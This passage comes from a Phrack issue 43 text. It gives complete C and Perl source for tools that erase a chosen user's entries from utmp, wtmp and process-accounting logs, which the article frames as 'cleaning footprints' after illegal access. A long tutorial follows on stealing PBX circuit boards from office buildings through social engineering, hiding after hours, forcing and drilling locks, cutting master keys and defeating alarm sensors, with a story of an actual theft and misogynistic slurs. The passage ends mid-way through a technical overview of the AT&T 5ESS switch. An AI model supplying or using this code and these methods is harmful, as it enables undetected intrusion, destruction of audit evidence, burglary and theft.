tcp_wrapper README Usually just editing the output and hoping the sysadmin didnt catch the the wrap will do the trick since nothing is output to the console (hopefully). # Example programs The following are short and sweet programs that give you the ability to edit some of the more common logfiles found on most platforms. Most of these are pretty simple to compile, although some might need minor porting and OS consideration changes in structures and configurations. ---- Begin of /etc/utmp editor: /* This program removes utmp entries by name or number */ #include #include #include #include void usage(name) char *name; { printf(stdout, "Usage: %s [ user ] or [ tty ]\n", name); exit(1); } main(argc,argv) int argc; char **argv; { int fd; struct utmp utmp; int size; int match, tty = 0; if (argc!=2) usage(argv[0]); if ( !strncmp(argv[1],"tty",3) ) tty++; fd = open("/etc/utmp",O_RDWR); if (fd >= 0) { size = read(fd, &utmp, sizeof(struct utmp)); while ( size == sizeof(struct utmp) ) { if ( tty ? ( !strcmp(utmp.ut_line, argv[1]) ) : ( !strcmp(utmp.ut_name, argv[1]) ) ) { lseek( fd, -sizeof(struct utmp), L_INCR ); bzero( &utmp, sizeof(struct utmp) ); write( fd, &utmp, sizeof(struct utmp) ); } size = read( fd, &utmp, sizeof(struct utmp) ); } } close(fd); } ---- End of /etc/utmp editor ---- Begin of /usr/adm/wtmp editor: /* This program removes wtmp entries by name or tty number */ #include #include #include #include void usage(name) char *name; { printf("Usage: %s [ user | tty ]\n", name); exit(1); } void main (argc, argv) int argc; char *argv[]; { struct utmp utmp; int size, fd, lastone = 0; int match, tty = 0, x = 0; if (argc>3 || argc<2) usage(argv[0]); if (strlen(argv[1])<2) { printf("Error: Length of user\n"); exit(1); } if (argc==3) if (argv[2][0] == 'l') lastone = 1; if (!strncmp(argv[1],"tty",3)) tty++; if ((fd = open("/usr/adm/wtmp",O_RDWR))==-1) { printf("Error: Open on /usr/adm/wtmp\n"); exit(1); } printf("[Searching for %s]: ", argv[1]); if (fd >= 0) { size = read(fd, &utmp, sizeof(struct utmp)); while ( size == sizeof(struct utmp) ) { if ( tty ? ( !strcmp(utmp.ut_line, argv[1]) ) : ( !strncmp(utmp.ut_name, argv[1], strlen(argv[1])) ) && lastone != 1) { if (x==10) printf("\b%d", x); else if (x>9 && x!=10) printf("\b\b%d", x); else printf("\b%d", x); lseek( fd, -sizeof(struct utmp), L_INCR ); bzero( &utmp, sizeof(struct utmp) ); write( fd, &utmp, sizeof(struct utmp) ); x++; } size = read( fd, &utmp, sizeof(struct utmp) ); } } if (!x) printf("No entries found."); else printf(" entries removed."); printf("\n"); close(fd); } ---- End of /usr/adm/wtmp editor ---- Begin of /usr/adm/lastcomm editor: #!/perl package LCE; $date = 'Sun Jul 4 20:35:36 CST 1993'; $title = 'LCE'; $author = 'Phreak Accident'; $version = '0.0'; $copyright = 'Copyright Phreak Accident'; #------------------------------------------------------------------------------ # begin getopts.pl # Usage: &Getopts('a:bc'); # -a takes arg. -b & -c not. Sets opt_*. sub Getopts { local($argumentative)=@_; local(@args,$_,$first,$rest,$errs); local($[)=0; @args=split(/ */, $argumentative ); while(($_=$ARGV[0]) =~ /^-(.)(.*)/) { ($first,$rest) = ($1,$2); $pos = index($argumentative,$first); if($pos >= $[) { if($args[$pos+1] eq ':') { shift(@ARGV); if($rest eq '') { $rest = shift(@ARGV); } eval "\$opt_$first = \$rest;"; } else { eval "\$opt_$first = 1"; if($rest eq '') { shift(@ARGV); } else { $ARGV[0] = "-$rest"; } } } else { print STDERR "Unknown option: $first\n"; ++$errs; if($rest ne '') { $ARGV[0] = "-$rest"; } else { shift(@ARGV); } } } $errs == 0; } # end getopts.pl #------------------------------------------------------------------------------ sub Initialize { $TRUE = '1'; # '1' = TRUE = '1' $FALSE = ''; # '' = FALSE = '' &Getopts('a:u:o:'); # Parse command line options $acct = $opt_a || $ENV{'ACCT'} || '/var/adm/pacct'; $user = $opt_u || $ENV{'USER'} || `/bin/whoami` || 'root'; $outf = $opt_o || $ENV{'OUTF'} || './.pacct'; select(STDOUT); $|++; close(I); open(I,'(cd /dev; echo tty*)|'); $ttys=; close(I); @ttys = split(/ /,$ttys); for $tty (@ttys) { ($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size, $atime,$mtime,$ctime,$blksize,$blocks) = stat("/dev/$tty"); $TTY{"$rdev"} = "$tty"; } $TTY{'65535'} = 'NoTTY'; # Get passwd info --> id:passwd:uid:gid:name:home:shell close (I); # open(I,"cat /etc/passwd|"); # If you don't run nis... open(I,"ypcat passwd|"); while () { chop; split(/:/); $PASSWD{"$_[$[+2]"}= $_[$[]; } $PASSWD{"0"}= 'root'; # Get group info --> id:passwd:gid:members close (I); # open(I,"cat /etc/group|"); # If you don't run nis... open(I,"ypcat group | "); while () { chop; split(/:/); $GROUP{"$_[$[+2]"}= $_[$[]; } } split(/ /,'Sun Mon Tue Wed Thu Fri Sat'); for ($x=$[ ; $x<$#_ ; $x++) { $DAY{"$x"} = $_[$x]; } split(/ /,'Error Jan Feb Mar Apr MAy Jun Jul Aug Sep Oct Nov Dec'); for ($x=$[ ; $x<$#_ ; $x++) { $MONTH{"$x"} = $_[$x]; } #------------------------------------------------------------------------------ sub LCE { &Initialize(); open(I,"<$acct"); close(O); open(O,">$outf"); $template='CCSSSLSSSSSSA8'; while (read(I,$buff,32)) { ($c1,$c2,$u,$g,$d,$bt,$ut,$st,$et,$o4,$o5,$o6,$c3) = unpack($template,$buff); ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime($bt); $mon++; $mon = "0$mon" if ($mon < 10); $mday = "0$mday" if ($mday < 10); $hour = "0$hour" if ($hour < 10); $min = "0$min" if ($min < 10); $sec = "0$sec" if ($sec < 10); $tt = localtime($bt); $flags=''; if ($c1 & 0001) { $flags .= 'F'; } if ($c1 & 0002) { $flags .= 'S'; } if ($c1 & 0004) { $flags .= 'P'; } if ($c1 & 0010) { $flags .= 'C'; } if ($c1 & 0020) { $flags .= 'K'; } if ($c1 & 0300) { $flags .= 'A'; } $c3 =~ s/\000.*$//; print STDOUT "$c3 $flags $PASSWD{$u}/$GROUP{$g} $TTY{$d}"; print STDOUT " $DAY{$wday} $hour:$min:$sec"; if ($PASSWD{$u} eq $user) { print " [ERASED] "; } else { print O pack($template,$c1,$c2,$u,$g,$d,$bt,$ut,$st,$et,$o4,$o5,$o6,$c3); } print "\n"; } close(O); } #------------------------------------------------------------------------------ &LCE(); #struct acct # { # char ac_flag; /* Accounting flag */ # char ac_stat; /* Exit status */ # uid_t ac_uid; /* Accounting user ID */ # gid_t ac_gid; /* Accounting group ID */ # dev_t ac_tty; /* control typewriter */ # time_t ac_btime; /* Beginning time */ # comp_t ac_utime; /* Accounting user time */ # comp_t ac_stime; /* Accounting system time */ # comp_t ac_etime; /* Accounting elapsed time */ # comp_t ac_mem; /* average memory usage */ # comp_t ac_io; /* chars transferred */ # comp_t ac_rw; /* blocks read or written */ # char ac_comm[8]; /* Accounting command name */ # }; # # #define AFORK 0001 /* has executed fork, but no exec */ # #define ASU 0002 /* used super-user privileges */ # #define ACOMPAT 0004 /* used compatibility mode */ # #define ACORE 0010 /* dumped core */ # #define AXSIG 0020 /* killed by a signal */ # #define ACCTF 0300 /* record type: 00 = acct */ ---- End of /usr/adm/lastcomm editor # All good things must come to an end In conclusion, you need to be smarter than the administrator. Being careless can get you busted. Clean your footprints. Watch the system. Learn new tricks. AND KEEP ON HACKING! Watch for my next article on 50 great system patches that will keep your access just the way it is .. illegal. Yaawhoo. # End of article ==Phrack Magazine== Volume Four, Issue Forty-Three, File 15 of 27 [** NOTE: The following file is presented for informational purposes only. Phrack Magazine takes no responsibility for anyone who attempts the actions described within. **] *************************************************************************** Physical Access & Theft of PBX Systems A DSR Tutorial by : CO/der DEC/oder & Cablecast 0perator. (K)opywronged 1993, by Dark Side Research *************************************************************************** BACKGROUND ~~~~~~~~~~ July 1989, Mobil Oil Corporation Headquarters -- Fairfax, VA. Abundant technology, late hours, and shadows between city lights made up the typical environment CO/der DEC/oder repeatedly found adventure in. On one such night in the summer of '89, a reconnaissance outing landed him at the offices of Mobil Oil Corp. The door leading from the multi-level parking garage into the foyer was equipped with an access-request phone and a square black pad. The pad was flush with the wall, and sported a red LED in its center -- a rather imposing device used to read magnetic access cards. CODEC picked up the phone and listened to a couple rings followed by the voice of a security guard, "Good evening, security ..." "Evenin', this is Dick Owens with CACI graphics. I don't have a card, but just call upstairs and they'll verify." "Hold on, sir ..." Kastle Security's verification call registered as a sudden 90 VAC spike on Cablecast 0perator's meter. Clipped on the blue and white pair of CACI's incoming hunt group, Cable picked up on his TS-21: "Hello?" "This is Kastle Security. We've got a Dick Owens downstairs requesting access." "Yeah Sure. Let him in please." The security man took Codec off hold, "Okay sir, what entrance are you at?" "Garage level one." The door clicked, and in went the hacker-thief -- grinning. Another lock at the end of a hallway also hindered access, but a screwdriver, placed between door and frame, removed the obstruction with a quickly applied force. CACI was a graphics outfit sharing the same building with Mobil. After a perusal through its desks and darkened corridors turned up a cardkey for later use, Codec -- pausing casually along the way at the drunking fountain -- made his way to the opposite end of the hallway and into Mobil's mail receiving room. In contrast to elsewhere in the building, this room was chilly -- as if heavy air conditioning was nearby. There was also a faint roar of fans to enhance this notion. And behind a countertop in the direction of the noise, a split door could be seen through which mail and parcels were passed during business hours. Hardly an obstacle, he was on the other side in an instant. This "other side" was no less than a gateway to nirvana. At first he began taking in the sight of a mini-computer, console, and mass storage devices, but his eyes were virtually pulled to the giant on his left. It was the largest and most impressive PBX he had yet seen; a label above the five gargantuan, interconnected cabinets read, "AT&T SYSTEM 85." The hacker's heart raced -- he wanted to explore, control, and own the switch all at once. Within seconds his gloved hands caressed the cabinets while his hungry eyes scanned circuit pack descriptors, mouth agape. Codec grabbed some manuals, jotted down numbers to a modem stack, and reluctantly departed. A week later, he stole the switch. To the Dark Side Research group, the System 85 would be worth approximately $100,000 -- but to Mobil, the system was worth at least six times that figure. In its entirety it was more valuable, but DSR was only concerned with the guts; the digital circuitry of the system. When Codec reentered the building the following week, he was wearing a VOX headset attached to a hand-held 2-meter band (HAM) radio. This was strapped to his chest except for the rubber-whip antenna which protruded out of a hole in his jacket. His awestruck, gleeful countenance from a week prior had been replaced by a more grave expression, and the moisture now on his body was no longer from unconscious salivation but due to the sweat of anticipation and rapid movement. "Phase one complete," he spoke into the boom mic in front of his face. "Roger Nine-Two. Quit breathing on the VOX or adjust sensitivity, over." "Roger Nine-Three. Entering heavy EMI area," Codec acknowledged to one of the lookouts. Steps were retraced through the mail room, where several empty boxes marked "U.S. Mail" and a dolly were conveniently stored. The System 85 was shut down, cabinet by cabinet, as most of the circuit boards were hastily removed and boxed. Seven boxes were filled, requiring two trips with the dolly to a side door. "All units: ready for docking." "Roger Nine-Two. Standby. Nine-Three, okay for docking?" "Step on it, over ..." A Ford Escort with its hatch open raced up to where Codec and the boxes stood. Within fifteen minutes the circuit packs were unloaded in a public storage unit. Within half an hour, CO/dec DEC/oder, Cablecast 0perator, and the remainder of the night's crew were filling up with doughnuts of the nearby 7-11, observing local law enforcement doing the same. APRIL 1993: Security memorandum broadcast from wrq.com -- Internet "We've all heard of toll fraud as a way to steal telecommunications resources. Now the ante has been escalated. I've heard of a company on the East Coast that was having some minor troubles with their PBX. A technician showed up at the door and asked directions to the PBX closet. The company showed this person the way without checking any credentials, and about five minutes later the phones went completely dead. They went up to the PBX closet and found that several boards from the PBX had been removed and that the 'repairman' had departed." The theft of PBX circuit boards is a novel idea and seldom heard of, but -- as made apparent above -- it does occur. In the used PBX scene, often referred to as the "secondary" or "grey" market, there is always a demand for circuit packs from a wide variety of PBXs. The secondhand PBX industry grew from $285 million in 1990 to $469 million in 1992 -- despite the recession. The essence of any PBX is a rack or multiple racks of circuit cards/boards/packs, with an average grey market value of anywhere from $50 to $2000 each. The cards are lightweight, small in size, and can even withstand a moderate dose of abuse. Transport of misappropriated circuit boards is done without risk -- under and police scrutiny, a box of these looks like a mere pile of junk (or senior engineering project) in the trunk of your car. Furthermore, the serial numbers on the boards are seldom, if ever, kept track of individually, and these can be removed or "replaced" in any case. Unlike computer equipment or peripherals, PBX cards are extremely safe, simple, and non-proprietary components to handle -- even in quantity. Although you may wish to physically access PBXs for reasons other than theft, it will be assumed here that monetary gain is your motive. In either case, this introductory file makes it clear that access can be achieved with varying levels of ease. A PBX theft should be thought of in terms of two phases: reconnaissance and extraction. Recon involves finding and selecting prime targets. Extraction is the actual theft of the system. Both phases can be completed through "office building hacking," a wide variety of deception, breaking and entering, social engineering, and technical skills. Phase I : Reconnaissance PBXs are found where people's communications needs warrant the capabilities of such a system -- offices, schools, hotels, convention centers, etc. The PBXs we will concert ourselves with in this discourse however are those located in shared or multiple-leased office structures; the "typical" office buildings. The typical office building has enough floors to require an elevator, some parking space, a lobby, and a company directory (Because it is shared by more than one business). Companies that occupy an entire building by themselves are generally too secure to be worthwhile targets. Tenant companies in the typical building lease all different size office space -- some rent only 300 sq. ft., others take up entire floors. Those that use half a floor or more usually meet the criteria for PBX ownership. Obviously, the larger the firm's office at that site, the greater its PBX will be, so those business spread out over several floors will have the most valuable systems. This is not always an overwhelming factor in determining a target however. The smaller systems are often easier to get at -- and ultimately to remove -- because they tend to be located in utility closets off publicly accessible hallways as opposed to within a room inside an office space. Those closets, sometimes labeled "telephone" and even unlocked, will be found one or two per floor! Other closets may exist for electrical equipment, HVAC, plumbing, janitorial supplies, or for a combination of these uses in addition to telephone service. A phone closet is easily distinguishable whether or not a switch or key system is present. A web of low-voltage (22 AWG), multi-colored wiring will be channelled and terminated on a series of white "66" blocks mounted on the wall. These blocks are a few inches wide, and roughly a foot long, with rows of metallic pins that the wiring is punched into with a special tool. As a general rule, if the system is fastened to the wall and doesn't have at least one muffin fan built-in and running, it's either a measly key system or a PBX too small to deserve your attention. Those worthy of your time will stand alone as a cabinet with a hinged door, contain shelves of circuit cards, and emanate the harmonious hum of cooling fans. As an example, Mitel PBXs commonly fit cozily in closets -- sometimes even one of the newer ROLMs or a voice mail system. On the other hand, an NT SL-100 should not be an expected closet find. Wandering through office buildings in search of phone closets during business hours is easy, so long as you dress and act the part. You'll also want to look confident that you know what you're doing and where you're going. Remember, these buildings are open to the public and an employee of one company can't tell whether or not you're a client of another. When going in and out of the phone closets, who's to know you're not a technician or maintenance man? Apart from searching the closets, you can approach the secretaries. Feign being lost and ask to use the telephone. Steal a glance at the console and you'll know (with a little practice) what type of PBX they've got. This is very valuable information, for it may save you from unsuccessfully breaking into the closet (should it be locked) or the company itself. Secretaries are cute, courteous, and dumb. You shouldn't have a problem convincing her to give you the key to the phone closet if you're posing as a technician. If you're feeling as confident as you should be, you may even get a date with the bitch. And should you ever raise suspicion, you always have the option of bailing out and making a break for the stairwell. No business exec is going to chase you down. Some additional methods can be employed in conjunction with visiting the buildings, or as a precursor to such : -- Classified ads. A company with job openings is all the more vulnerable to your dark motives. Using the help-wanted section of your newspaper, look for receptionist and secretarial positions. Call and ask, "What type of phone system will I be required to handle?" You may also want to go in and apply for the job -- any job at a large firm will do. You'll learn the type of system installed, some details about security, etc; this is a very sophisticated way of "casin' the joint." -- Scanning for RMATS. Using your preferred wardialer (such as ToneLoc), scan business districts for PBX remote maintenance modems then CNA your finds. -- Targeting interconnects. Interconnects are PBX dealers that sell, install, and maintain the systems on contract. Capture a database of clients and you'll have a windfall of leads and pertinent info. AT&T allegedly sells its database by region. Also, intercept voice mail or company e-mail. Interconnects make decent targets themselves. -- Users groups and newsletters. Some of the extremely large PBX owners join users groups. Though this is abstract, owners will discuss their systems openly at the meetings. Newsletters are mailed out to members, often discussing special applications of specific locations in detail. Great for making sales contacts. Phase II : Extraction Removing the PBX calls for an assessment of obstacles versus available means and methods. The optimum plan incorporates a late afternoon entry with a nighttime departure. This means entering the building during business hours and hiding, either in the PBX closet itself or any room or empty space where you can wait until after hours to re-emerge. This is the most safest and effective of methods. You need not worry about alarms or breaking in from outside, and you can take advantage of one of the greatest weaknesses in corporate office security -- janitors. The janitorial staff, if you act and dress properly, will allow you to walk right into an office while they're cleaning. If you're already in an office and they enter, just act like you own the place and it'll be assumed you work there. If you prefer not to be seen, keep hidden until the cleaning is done on your floor. (Be sure not to make the idiotic mistake of hiding in the janitor's closet). Although the custodians will lock the doors behind them, any alarms in the building will remain off until cleaning for the entire structure is complete. There is simply nothing so elegant as entering the building during the daytime hours, hiding, and re-emerging to wreak havoc when everyone's gone. (A patient wait is required -- take along a Phrack to read). Unfortunately, entry will not always be so easy. The phone closet may have a dead-bolt lock. There may be no feasible hiding place. People may constantly be working late. Because of all the potential variables, you should acquire a repertoire of means and methods. Use of these methods, though easy to learn, is not so quickly mastered. There is a certain "fluidity of technique" gained only through experience. Deciding which to use for a given situation will eventually come naturally. -- Use of tools. You can easily get around almost any office building using only screwdrivers. With practice, prying doors will be quick and silent. Although some doors have pry-guards or dead-bolts, about every other phone closet you'll encounter can be opened with a screwdriver. Before forcing the gap between door and frame, try sliding back the locking mechanism. For best results, work it both ways with a pair of screwdrivers; a short one for leverage, a longer one for manipulation. For dead-bolts, a pipe wrench (a wrench with parallel grips) can turn the entire lock 90 degrees. Interior doors are cheaply constructed; if you can wrench the lock, it'll turn and the bolt will be pulled back into the door. Quality dead-bolts have an inclined exterior to prevent it from being gripped. For these, diamond-cutting string can be applied. This is available at select plumbing supply houses for $150 upwards. -- Ceilings and adjacent offices. Not only are the doors cheap inside office buildings, so are the walls. If you're having trouble with a door or lock, push up a ceiling tile with your screwdriver and see if the wall stops or is continuous. If it stops, you may choose to climb over. If you're already inside an office and find a particular room locked, climbing is always an option because walls are never continuous between rooms. Walls are seldom continuous between business either; if you can't get into a particular office space, try through adjacent space. -- Brute force. If making noise is not a serious concern, a crowbar will pry any door open. For most situations requiring this level of force, a sleek, miniature bar is all you need. You can also saw or hammer your way through any interior wall. Once you've made a hole in the sheetrock, you can practically break out the remainder of an opening yourself using only your hands. From the outside, windows can be broken or removed. Office building glass is installed from the outside, so by removing the seal and applying a suction device, you can pull the entire window out. Breaking the glass is not too difficult, but frighteningly loud. Using a screwdriver, push the blade between the edge and its frame and pry. Eventually you'll have holes and cracks running across the window. Building glass is typically double-paned; once through the exterior layer, you'll have to break the next. Because the second layer isn't as thick, you have the option of prying or smashing. This sounds extremely primitive -- it is, but it may be the only method available to you. Highly-alarmed office structures do not have the windows wired. When there's a 5,000-port NEC NEAX 2400 in view and alarms everywhere else, you'll break the fucking glass. -- Alarm manipulation. Entire files could be written on this subject. Some relevant facts will be touched on here; no MacGyver shit. Our "typical" office building, if alarmed, has one of three types of alarm plans. The alarm system is either externally-oriented, internally-oriented, or both. More often than not, externally-oriented alarm systems are encountered. These focus on keeping outside intruders from entering the building -- interior offices are secured only by locks. Alarm devices such as magnetic switches and motion detectors are in place solely in lobby areas and on doors leading from outside. If you know in advance that you can readily enter any of the offices, the alarm is harmless. After entering, go directly into the office and look out the window. Eventually, security or police will arrive, look around, then reset the alarm and leave -- so long as you haven't left any trace of your entry (damaged doors, ceiling tile fragments, etc). Although common areas and corridors will be briefly scanned, no company offices will be entered. Internally-oriented alarm plans include alarms on individual offices and are more difficult to reckon with. However, the sensors are only on the doors; any method that avoids opening the door can still be used. Access controls like cardkeys are impressive in appearance but do not automatically represent an alarm. If you open the door without inserting a cardkey, the system must be equipped to know whether a person entered the building or exited. Thus, only those systems with motion detectors or a "push button to exit" sign and button can cause an alarm at the cardkey-controlled door. Otherwise the door and cardkey device is no more than a door with an electronic lock. There are always exceptions to the rules, of course; never trust any alarm or access control system. Sometimes a system will be programed to assume any opened door is someone entering, not exiting. Check for sensors -- mounted flush on the door frame -- look carefully, they'll sometimes be painted over. Check both sides and top of the frame. If a sensor is found (or when in doubt) hold the door open for about ten seconds, then wait and watch for up to an hour to see if there's a silent alarm. For the "push button to exit" entrances, you can sometimes use a coat hanger or electricians fish tape to push the button from outside using cracks around the door. Where motion detectors automatically open the entrance, similar devices can be employed to create enough commotion to activate the detector (depending on detector type). Disabling part of the alarm system may be a possibility during the day. Chances are, if you can access the control CPU you've also got a place to hide, and the control box is often alarmed against tampering anyway. Many of the latest systems are continuously monitored from a central station. If not, you can disconnect the alarm box from its phone line. Your best approach however is to alter a door sensor/magnetic switch circuit. You can use a piece of conductive hot water duct tape to trick the sensor into thinking the door is always closed. This tape looks like tin foil with an adhesive on one side. Obtain a similar sensor and test at home before relying on this -- magnetic switches come in many shapes and forms. The better systems don't even check for normally-open or normally-closed states, but for changes in the loop's resistance. This means simply cutting or shorting the lead wires won't suffice. But if the conductive tape won't do, you can always just cut the leads and return in a couple days. If the cut hasn't been repaired, then you have an entry point. Building managers become lax with an alarm system after it's been installed for a while and there haven't been any break-ins. Other loops are disabled after late-working employees repeatedly off the alarm. One other option is to cut and splice both parts of the sensor back into the loop so that it remains unaffected by movement of the door. The throughways to target for any of these alterations are minor side doors such as parking garage or stairwell exits. You should be pleasantly surprised with the results. -- Locks and picks. (This could be another textfile in itself). Lockpicking is an extremely useful skill for PBX appropriation but requires quite a bit of practice. If you aren't willing to invest the time and patience necessary to become effective with this skill, screwdrivers are the next best thing. Furthermore, with all the different types and brands of locks in existence, you'll never be able to solely rely on your lockpicking skills. Acquire this ability if your involvement in underworld activities is more than just a brief stint... You can more readily take advantage of the skills possessed by locksmiths. Because the offices within a typical building all use the same brand lock with a common keying system, any of the locks can yield the pattern for a master key to the whole system. Obtain a spare lock from the basement, maintenance room, or anywhere extra doors and hardware are stored, and take it to a locksmith. Request a key for that lock and a master. Many of the offices should now be open to you. Some keys are labeled with numbers -- if the sequence on the key equals the number of pins in the lock, you can write down the number and lock brand, and get a duplicate of the key cut. There is also a little locksmithing you can do on your own. With a #3 triangular "rat tail" file and a key blank to the brand lock you are targeting, you can make your own key. Blanks are either aluminum or brass and scratch easily -- this is no accident. By inserting a key blank in the lock and moving it from side to side, you'll create slate-colored scratch lines on the blank from the lock's pins. The lines will indicate where to begin filing a valley -- there'll be one for each pin. Move the file back and forth a few times and re-insert the key to make new lines. Use the point of the file only when beginning the valley; successive passes should not create a point at the bottom of the cut but leave a flat gap. When no new scratch appears on the bottom of a particular valley, don't file the valley any deeper -- it's complete. Eventually, all the valleys will be cut and you'll have a key to open the lock. Last but certainly not least, you can drill most locks where a little noise can be afforded. Using a 1/4 inch Milwaukee cordless drill with about a 1/8 inch carbide-tipped bit, you can drill a hole the length of the lock's cylinder. Drill approximately 1/8 inch directly above the keyhole. This destroys the lock's pins in its path, and allows others above to fall down into the hole. Now the cylinder will turn with any small screwdriver placed in the keyhole and open the lock. Little practice is demanded of this technique, and it's a hell of a lot of fun. -- Elevator manipulation. Elevators can be stubborn at times in rejecting your floor requests. Companies that occupy entire floors must prevent an after-hours elevator from opening up on their unattended office. If there's a small lock corresponding or next to that floor's selection button, unscrew the panel and short out the two electrical leads on the other end of the lock. Continue to short the contacts until you press the button and it stays lit -- you'll then arrive at your desired floor. The elevator motor and control room is located either on the roof or penthouse level and can be frequently found accessible. Besides being a place to hide, sometimes you can find a bank of switches that override the elevator's control panel (if for some reason you can't open it or it's cardkey-controlled) and get to your floor that way. Two people with radios are needed to do this -- one in the equipment room, one in the elevator. Watch for high voltage and getting your coat caught in a drive belt ... Operation Integrity By taking advantage of daytime access, hiding places, and some of the more sophisticated methods, there's no need to become an alarm connoisseur or full-blown locksmith to liberate PBX equipment. When you can't avoid nighttime activity or an activated alarm system, then be sure to take extra precautions. Have lookouts, two-way radios, even a police scanner. Don't use CB radios, but rather HAM transceivers or anything that operates on proprietary frequencies. This will require a small investment, but there's no price on your safety. Office buildings in downtown areas tend to be more secure than those in the suburbs or outlying areas. Location and surroundings are important considerations when your operation takes place at night. It should also be noted that a building without a security guard (typically the norm) may still subscribe to sporadic security checks where rent-a-cops drive around the building at some regular interval. With regard to transportation and storage, rent vehicles and facilities in alias names where appropriate. Use taxis to pick you up when you're departing with only a briefcase or single box of cards. No matter what the time may be, anyone seeing you enter a taxi in front of the office will assume you're legit. It is our sincere wish that you apply this information to the fullest extent in order to free yourself from becoming a mere tool of capitalism, and use this freedom to pursue those things in life that truly interest you. We have tried to summarize and convey enough basic information here to provide you with a complete underground operation possibility. All material in this file is based on actual experience of the authors and their associates. For information on the sale of PBX or other telecommunications equipment, or for any other inquiry, contact the Dark Side Research group at the following Internet address : codec@cypher.com *************************************************************************** ==Phrack Magazine== Volume Four, Issue Forty-Three, File 16 of 27 % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % AT$T 5ESS(tm) % % % From Top to Bottom % % % % % % % % % by: Firm G.R.A.S.P. % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % Introduction ~~~~~~~~~~~~ Welcome to the world of the 5ESS. In this file I will be covering the switch topology, hardware, software, and how to program the switch. I am sure this file will make a few people pissed off over at BellCORE. Anyways, the 5ESS switch is the best (I think) all around switch. Far better then an NT. NT has spent too much time with SONET and their S/DMS TransportNode OC48. Not enough time with ISDN, like AT$T has done. Not only that, but DMS 100s are slow, slow, slow! Though I must hand it to NT, their DMS-1 is far better then AT$T's SLC-96. What is the 5ESS ~~~~~~~~~~~~~~~~ The 5ESS is a switch. The first No. 5ESS in service was cut over in Seneca, Illinois (815) in the early 1982. This test ran into a few problem, but all and all was a success. The 5ESS is a digital switching system, this advantage was realized in No. 4 ESS in 1976. The 5ESS network is a TST (Time Space Time) topology, the TSIs (Time Slot Interchangers) each have their own processor, this makes the 5ESS one of the faster switches. Though I hear some ATM switches are getting up there. 5ESS System Architecture & Hardware ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 5ESS SYSTEM ARCHITECTURE OSS Data Links ^ ^ ^ | | | | | | ......|.|....|...... : v v v : : ------------- : : | | : : | Input | : ........................... : | Output |====== TTY/CRT ----------- : : : | Processor | : | Switch |<=========== : : ------------- : | Module |<========] | : : ^ .............. ----------- : v v : : | : o : ======= ---------- : : | ------------ : o : | TMS |<->|Message | : : | | Main | : o : | |<->|Switch |<============ | | Store | : ----------- : ======= ---------- : : | | -----.------ : | Switch | : ^ ^ : : | | | : | Module |<========= | : : v v | : -----------<=========== : : -------------- | : :.........................: : | 3B |======= : : | Central | : : | Control |<=====> Disk! : : -------------- : : : ................................: COMMUNICATIONS MODULE ADMINISTRATIVE MODULE The 5 ESS is a digital SPC switching system which utilizes distributed control, a TST switching network and modular hardware and software design. The major components are: ADMINISTRATIVE MODULE Two 3B20S Processors (Which equal a 3B20D) - Central control and main storage - Disk storage for infrequently used programs and data, and main storage regeneration. - The two 3B20S processors are always comparing data, and when one fails the other acts in its place. Two Input/Output Processors (IOP) - Provides TTY and data-link interfaces to the 3B20D Processor, 5ESS Network, Master Control Center (MCC), and various Operational Support Systems (OSS). Here is a list of the defult TTY (also called "channels") tty Channel Name ttyA Master control console (MCC) terminal. ttyB Master control console (MCC) terminal. ttyC Traffic report printer ttyJ supplementary trunk and line work station (STLWS) terminals ttyK supplementary trunk and line work station (STLWS) terminals ttyL supplementary trunk and line work station (STLWS) terminals ttyM supplementary trunk and line work station (STLWS) terminals ttyN supplementary trunk and line work station (STLWS) terminals ttyO supplementary trunk and line work station (STLWS) terminals ttyP Repair service bureau - Recent change and verify (RSB-RCV) ttyR Office records printer ttyQ Switching control center-recent change and verify (SCC-RCV) terminals ttyR Repair service bureau-automatic line insulation testing (RSB-ALIT) terminal. ttyS Switching control center-recent change and verify (SCC-RCV) terminals ttyT Switching control center-recent change and verify (SCC-RCV) terminals ttyU Belt line B ttyV Local recent change and verify (RCV) terminal ttyW Remote recent change and verify (RCV) terminal. ttyY Network administration center (NAC) terminal. ttyZ The switching control center (SCC) terminal. ttyi SLC(R) carrier maintenance ttyj STLWS - fifth of six ttyk STLWS - sixth of six ttyl STLWS - first of six ttym STLWS - second of six ttyn STLWS - third of six ttyo STLWS - fourth of six ttyp RCV/Repair Service Bureau ttyq RCV/Network Administration Center ttyr ALIT/Repair Service Bureau ttys Maintenance ttyt Maintenance ttyu Belt line A ttyv Local RC/V ttyw Remote RC/V ttyx Maintenance Control Center/Switching Control Center System (MCC/SCCS) ttyy Maintenance Control Center/Switching Control Center System (MCC/SCCS) ttyz Maintenance Control Center/Switching Control Center System (MCC/SCCS) FILE Destination file name in /rclog partition mt00 High-density tape device, rewind after I/O mt04 High-density tape device, does not rewind after I/O mt08 Low-density tape device, rewind after I/O mt0c Low-density tape device, does not rewind after I/O mt18 Low-density tape device, rewind after I/O mt1c Low-density tape device, does not rewind after I/O mttypc0 Special tape device, IOP 0, rewind after I/O mttypc1 Special tape device, IOP 1, rewind after I/O. Two Automatic Message Accounting (AMA) units - Uses data links to transport calling information to central revenue accounting office and AMA tape. Here is the basic structure AMA structure for the OSPS model. - Called customer's telephone number, either a seven- or ten-digit number - Calling customer's telephone number, seven digits - Date - Time of day - Duration of conversation. COMMUNICATIONS MODULE Message Switch (MSGS) - Provides for control message transfer between the 3B20D Processor and Interface Modules (IM's) - Contains the clock for synchronizing the network. Time Multiplexed Switch (TMS) - Performs space division switching between SM's - Provides permanent time slot paths between each SM and the MSGS for control messages between the Processor and SM's (or between SM's) Switching Module (SM) - Terminates line and trunks - Performs time division switching - Contains a microprocessor which performs call processing function for the SM 5ESS - SWITCH MODULE -------------- | | | SMPU | |------------| --------- | | | | (64) | | Analog Sub Lines <---->| LU |<-------->| | |-------| | | | | (64) | | Analog Trunk Lines <-->| TU |<-------->| | (256) |-------| | TSIU |<--------> NCT | | | | Links | | (128) | 512 | to SLC-96 Remote <------->| DCLU |<-------->| Time |<--------> TMS | | | Slots | |-------| | | | | | | | | | | | | | | | | (256) | | T1 Lines <---------->| DLTU |<-------->| | | | | | | | | | | | |------------| --------- | | | DSU | -------------- COMMON COMPONENTS OF THE SWITCH MODULE (SM) Switch Module Processor Unit (SMPU) - Contains microprocessors which perform many of the call processing functions for trunks and links terminated on the SM. Time Slot Interchange 